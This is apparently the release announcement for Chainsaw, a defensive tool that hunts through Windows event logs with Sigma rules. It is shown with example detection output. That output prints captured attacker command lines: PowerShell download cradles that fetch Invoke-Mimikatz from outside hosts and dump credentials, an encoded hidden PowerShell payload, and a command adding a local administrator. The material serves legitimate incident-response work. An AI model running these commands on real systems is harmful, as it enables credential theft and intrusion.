Chainsaw

Rapidly Hunt and Search Through Windows Event Logs

GitHub Repository: https://github.com/Countercept/chainsaw

The tool we are releasing today – Chainsaw – provides blue teams with a powerful first-response capability to quickly identify threats within event logs. Chainsaw is a command-line tool that provides a fast method of running Sigma rule detection logic over event log data to highlight suspicious entries. Chainsaw also contains built-in logic for detection use-cases that are not suitable for Sigma rules, and provides a simple interface to search through event logs by keyword, regex pattern, or for specific event IDs

Background

Windows event logs provide a rich source of forensic information for threat hunting and incident response investigations. Unfortunately, processing and searching through event logs can be a slow and time-consuming process, and in most cases requires the overhead of surrounding infrastructure – such as an ELK stack or Splunk instance – to hunt efficiently through the log data and apply detection logic. This overhead often means that blue teams are unable to quickly triage Windows event logs to provide the direction and conclusions required to progress their investigations.

At F-Secure Countercept, we ingest a wide range of telemetry sources from endpoints via our EDR agent to provide our managed detection and response service. However, there are circumstances where we need to quickly analyze event log data that hasn’t been captured by our EDR, a common example being incident response investigations on an estate where our EDR wasn’t installed at the time of the compromise. Chainsaw was created to provide our threat hunters and incident response consultants with a tool to perform rapid triage of Windows event logs in these circumstances.

At the time of writing, there are very few open-source, standalone tools that provide a simple and fast method of triaging Windows event logs, identifying interesting elements within the logs and applying a detection logic rule format (such as Sigma) to detect signs of malicious activity. In our testing, the tools that did exist struggled to efficiently apply detection logic to large volumes of event logs making them unsuitable for scenarios where quick triage is required.

Chainsaw Overview

Chainsaw is written completely in Rust and utilizes both the EVTX parser library provided by @obenamram to load and convert event log files to JSON, and our tau-engine library written by @AlexKornitzer to match logic patterns from Sigma detection rule against event log data.

Key Features

Chainsaw provides a range of searching and hunting features which aims to help threat hunters and incident response teams detect suspicious event log entries to aid in their investigations. The key features include:

  • Search through event logs by event ID, keyword, and regex patterns
  • Extraction and parsing of Windows Defender, F-Secure, Sophos, and Kaspersky AV alerts
  • Detection of key event logs being cleared, or the event log service being stopped
  • Users being created or added to sensitive user groups
  • Brute-force of local user accounts
  • RDP logins, network logins etc.
  • Sigma rule detection against a wide variety of Windows event IDs, including:
Event TypeEvent ID
Process Creation (Sysmon)1
Network Connections (Sysmon)3
Image Loads (Sysmon)7
File Creation (Sysmon)11
Registry Events (Sysmon)13
Powershell Script Blocks4104
Process Creation4688
Scheduled Task Creation4698
Service Creation7045

Usage Example #1 - Hunting

-> % ./chainsaw hunt ./samples --rules ./rules/sigma_rules --mapping ./mapping_files/sigma-mapping.yml --json detections.json

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By F-Secure Countercept (Author: @FranticTyping)

[+] Found 20 EVTX files
[+] Loaded 726 detection rules (72 could not be converted)
[+] Printing results to screen
[+] Saving results to: detections.json
[+] Hunting: [========================================] 20/20

[+] Detection: (Built-in Logic) - Security audit log was cleared
┌─────────────────────┬──────┬───────────────────┬──────────────┐
│     system_time     │  id  │     computer      │ subject_user │
├─────────────────────┼──────┼───────────────────┼──────────────┤
│ 2019-05-03 15:20:20 │ 1102 │ "SANS-TBT570"     │ "student"    │
└─────────────────────┴──────┴───────────────────┴──────────────┘

[+] Detection: (External Rule) - Suspicious Service Installed
┌─────────────────────┬──────┬────────────────────────────┬───────────────┬──────────────────────────────────────────┬──────────────────┐
│     system_time     │  id  │      detection_rules       │ computer_name │        Event.EventData.ImagePath         │   service_name   │
├─────────────────────┼──────┼────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────┤
│ 2016-08-18 20:40:21 │ 7045 │ ‣ Mimikatz Command Line    │ "IE10Win7"    │ %COMSPEC% /b /c start /b /min powershell │ SYyGmEHvgHiGYApk │
│                     │      │ ‣ FromBase64String Command │               │ .exe -nop -w hidden -c if([IntPtr]::Size │                  │
│                     │      │ Line                       │               │  -eq 4){$b='powershell.exe'}else{$b=$env │                  │
│                     │      │ ‣ Encoded FromBase64String │               │ :windir+'\syswow64\WindowsPowerShell\v1. │                  │
│                     │      │ ‣ Encoded IEX              │               │ 0\powershell.exe'};$s=New-Object System. │                  │
│                     │      │                            │               │ Diagnostics.ProcessStartInfo;$s.FileName │                  │
│                     │      │                            │               │ =$b;$s.Arguments='-nop -w hidden -c $s=N │                  │
│                     │      │                            │               │ ew-Object IO.MemoryStream(,[Convert]::Fr │                  │
│                     │      │                            │               │ omBase64String(''H4sIADQdtlcCA7VWa2/aSBT │                  │
│                     │      │                            │               │ 93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2T │                  │
│                     │      │                            │               │ sIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/I │                  │
│                     │      │                            │               │ tQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98wa │                  │
│                     │      │                            │               │ GM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d │                  │
│                     │      │                            │               │ +rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N │                  │
│                     │      │                            │               │ 1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5T │                  │
│                     │      │                            │               │ V+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLl │                  │
│                     │      │                            │               │ NrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPA │                  │
│                     │      │                            │               │ LiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0r │                  │
│                     │      │                            │               │ GjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32a │                  │
│                     │      │                            │               │ kT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39 │                  │
│                     │      │                            │               │ Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+v │                  │
│                     │      │                            │               │ N/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3 │                  │
│                     │      │                            │               │ jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEc │                  │
│                     │      │                            │               │ Sn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPI │                  │
│                     │      │                            │               │ r3onDyPHAudSsA9g...                      │                  │
│                     │      │                            │               │                                          │                  │
│                     │      │                            │               │ (use --full to show all content)         │                  │
└─────────────────────┴──────┴────────────────────────────┴───────────────┴──────────────────────────────────────────┴──────────────────┘

[+] Detection: (External Rule) - Suspicious Command Line
┌─────────────────────┬──────┬─────────────────────────────────┬───────────────┬──────────────────────────────────────────┬──────────────────────────────────────────┐
│     system_time     │  id  │         detection_rules         │ computer_name │       Event.EventData.CommandLine        │               process_name               │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-08-18 20:24:48 │ 4688 │ ‣ Rundll32 Without Parameters   │ "IE10Win7"    │ rundll32.exe                             │ C:\Windows\System32\rundll32.exe         │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-08-18 20:40:21 │ 4688 │ ‣ Mimikatz Command Line         │ "IE10Win7"    │ C:\Windows\system32\cmd.exe /b /c start  │ C:\Windows\System32\cmd.exe              │
│                     │      │ ‣ FromBase64String Command      │               │ /b /min powershell.exe -nop -w hidden -c │                                          │
│                     │      │ Line                            │               │  if([IntPtr]::Size -eq 4){$b='powershell │                                          │
│                     │      │ ‣ Encoded FromBase64String      │               │ .exe'}else{$b=$env:windir+'\syswow64\Win │                                          │
│                     │      │ ‣ Encoded IEX                   │               │ dowsPowerShell\v1.0\powershell.exe'};$s= │                                          │
│                     │      │                                 │               │ New-Object System.Diagnostics.ProcessSta │                                          │
│                     │      │                                 │               │ rtInfo;$s.FileName=$b;$s.Arguments='-nop │                                          │
│                     │      │                                 │               │  -w hidden -c $s=New-Object IO.MemoryStr │                                          │
│                     │      │                                 │               │ eam(,[Convert]::FromBase64String(''H4sIA │                                          │
│                     │      │                                 │               │ DQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVd │                                          │
│                     │      │                                 │               │ szLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpda │                                          │
│                     │      │                                 │               │ S2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJ │                                          │
│                     │      │                                 │               │ ykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebT │                                          │
│                     │      │                                 │               │ YV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njF │                                          │
│                     │      │                                 │               │ QnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3Pt │                                          │
│                     │      │                                 │               │ biFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8n │                                          │
│                     │      │                                 │               │ M2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHd │                                          │
│                     │      │                                 │               │ GC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNu │                                          │
│                     │      │                                 │               │ IVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMC │                                          │
│                     │      │                                 │               │ xLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqK │                                          │
│                     │      │                                 │               │ wI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fv │                                          │
│                     │      │                                 │               │ XXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUh │                                          │
│                     │      │                                 │               │ p2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RS │                                          │
│                     │      │                                 │               │ O3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3 │                                          │
│                     │      │                                 │               │ irEoT6p7H3sUSuVl...                      │                                          │
│                     │      │                                 │               │                                          │                                          │
│                     │      │                                 │               │ (use --full to show all content)         │                                          │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-08-27 15:32:35 │ 4688 │ ‣ Windows PowerShell Web        │ "IE10Win7"    │ C:\Windows\system32\WindowsPowerShell\v1 │ C:\Windows\System32\WindowsPowerShell\v1 │
│                     │      │ Request                         │               │ .0\powershell.exe "IEX (New-Object Net.W │ .0\powershell.exe                        │
│                     │      │ ‣ PowerShell Download from      │               │ ebClient).DownloadString('https://eic.me │                                          │
│                     │      │ URL                             │               │ /17'); Invoke-Mimikatz –DumpCreds"       │                                          │
│                     │      │ ‣ Encoded IEX                   │               │                                          │                                          │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-09-01 19:44:24 │ 4688 │ ‣ Net.exe Execution             │ "IE10Win7"    │ C:\Windows\system32\net1 localgroup admi │ C:\Windows\System32\net1.exe             │
│                     │      │                                 │               │ nistrators sec511 /add                   │                                          │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-09-20 18:45:24 │ 4688 │ ‣ Windows PowerShell Web        │ "IE10Win7"    │ powershell.exe "IEX (New-Object Net.WebC │ C:\Windows\System32\WindowsPowerShell\v1 │
│                     │      │ Request                         │               │ lient).DownloadString('https://raw.githu │ .0\powershell.exe                        │
│                     │      │ ‣ PowerShell Download from      │               │ busercontent.com/mattifestation/PowerSpl │                                          │
│                     │      │ URL                             │               │ oit/master/Exfiltration/Invoke-Mimikatz. │                                          │
│                     │      │ ‣ Encoded IEX                   │               │ ps1'); Invoke-Mimikatz -DumpCreds"       │                                          │
├─────────────────────┼──────┼─────────────────────────────────┼───────────────┼──────────────────────────────────────────┼──────────────────────────────────────────┤
│ 2016-09-21 03:41:02 │ 4688 │ ‣ Rundll32 Without Parameters   │ "IE10Win7"    │ rundll32.exe                             │ C:\Windows\System32\rundll32.exe         │
└─────────────────────┴──────┴─────────────────────────────────┴───────────────┴──────────────────────────────────────────┴──────────────────────────────────────────┘

[+] Detection: (Built-in Logic) - New User Created
┌─────────────────────┬──────┬───────────┬─────────────────┬──────────────────────────────────────────────────┐
│     system_time     │  id  │ computer  │ target_username │                     user_sid                     │
├─────────────────────┼──────┼───────────┼─────────────────┼──────────────────────────────────────────────────┤
│ 2013-10-23 16:22:39 │ 4720 │ "IE8Win7" │ "IEUser"        │ "S-1-5-21-3463664321-2923530833-3546627382-1000" │
└─────────────────────┴──────┴───────────┴─────────────────┴──────────────────────────────────────────────────┘

[+] Detection: (Built-in Logic) - User added to interesting group
┌─────────────────────┬──────┬───────────┬───────────────────────────┬──────────────────────────────────────────────────┬──────────────────┐
│     system_time     │  id  │ computer  │        change_type        │                     user_sid                     │   target_group   │
├─────────────────────┼──────┼───────────┼───────────────────────────┼──────────────────────────────────────────────────┼──────────────────┤
│ 2013-10-23 16:22:40 │ 4732 │ "IE8Win7" │ User added to local group │ "S-1-5-21-3463664321-2923530833-3546627382-1000" │ "Administrators" │
└─────────────────────┴──────┴───────────┴───────────────────────────┴──────────────────────────────────────────────────┴──────────────────┘

[+] Detection: (Built-in Logic) - System log was cleared
┌─────────────────────┬─────┬───────────────────┬──────────────┐
│     system_time     │ id  │     computer      │ subject_user │
├─────────────────────┼─────┼───────────────────┼──────────────┤
│ 2019-04-27 21:04:25 │ 104 │ "DESKTOP-JR78RLP" │ "jwrig"      │
└─────────────────────┴─────┴───────────────────┴──────────────┘

[+] Detection: (Built-in Logic) - Event Log Service Stopped
┌─────────────────────┬──────┬───────────────────┬─────────────────────┬────────────┐
│     system_time     │  id  │     computer      │    service_name     │   status   │
├─────────────────────┼──────┼───────────────────┼─────────────────────┼────────────┤
│ 2019-04-27 21:04:51 │ 7040 │ "DESKTOP-JR78RLP" │ "Windows Event Log" │ "disabled" │
└─────────────────────┴──────┴───────────────────┴─────────────────────┴────────────┘

[+] Detection: (Built-in Logic) - Account Brute Forcing
┌──────┬─────────────────┬────────────────────┐
│  id  │    username     │ failed_login_count │
├──────┼─────────────────┼────────────────────┤
│ 4625 │ "Administrator" │ 3560               │
└──────┴─────────────────┴────────────────────┘

[+] Detections saved to: detections.json

Usage Example #2 - Searching

-> % ./chainsaw search ./samples/subset/ -i -s "mimikatz"

 ██████╗██╗  ██╗ █████╗ ██╗███╗   ██╗███████╗ █████╗ ██╗    ██╗
██╔════╝██║  ██║██╔══██╗██║████╗  ██║██╔════╝██╔══██╗██║    ██║
██║     ███████║███████║██║██╔██╗ ██║███████╗███████║██║ █╗ ██║
██║     ██╔══██║██╔══██║██║██║╚██╗██║╚════██║██╔══██║██║███╗██║
╚██████╗██║  ██║██║  ██║██║██║ ╚████║███████║██║  ██║╚███╔███╔╝
 ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚═╝╚═╝  ╚═══╝╚══════╝╚═╝  ╚═╝ ╚══╝╚══╝
    By F-Secure Countercept (Author: @FranticTyping)

[+] Found 20 EVTX files
[+] Printing results to the screen
[+] Searching: [==>-------------------------------------] 1/20 ⠼

{
  "Event": {
    "#attributes": {
      "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
    },
    "EventData": {
      "CommandLine": "powershell.exe  \"IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds\"",
      "NewProcessId": "0xdb8",
      "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "ProcessId": "0x80c",
      "SubjectDomainName": "IE10WIN7",
      "SubjectLogonId": "0x6590f",
      "SubjectUserName": "IEUser",
      "SubjectUserSid": "S-1-5-21-3463664321-2923530833-3546627382-1000",
      "TokenElevationType": "%%1937"
    },
    "System": {
      "Channel": "Security",
      "Computer": "IE10Win7",
      "Correlation": null,
      "EventID": 4688,
      "EventRecordID": 12989,
      "Execution": {
        "#attributes": {
          "ProcessID": 4,
          "ThreadID": 64
        }
      },
      "Keywords": "0x8020000000000000",
      "Level": 0,
      "Opcode": 0,
      "Provider": {
        "#attributes": {
          "Guid": "54849625-5478-4994-A5BA-3E3B0328C30D",
          "Name": "Microsoft-Windows-Security-Auditing"
        }
      },
      "Security": null,
      "Task": 13312,
      "TimeCreated": {
        "#attributes": {
          "SystemTime": "2016-09-20T00:20:56.173828Z"
        }
      },
      "Version": 1
    }
  }

<SNIP>

[+] Searching: [========================================] 20/20
[+] Found 30 matching log entries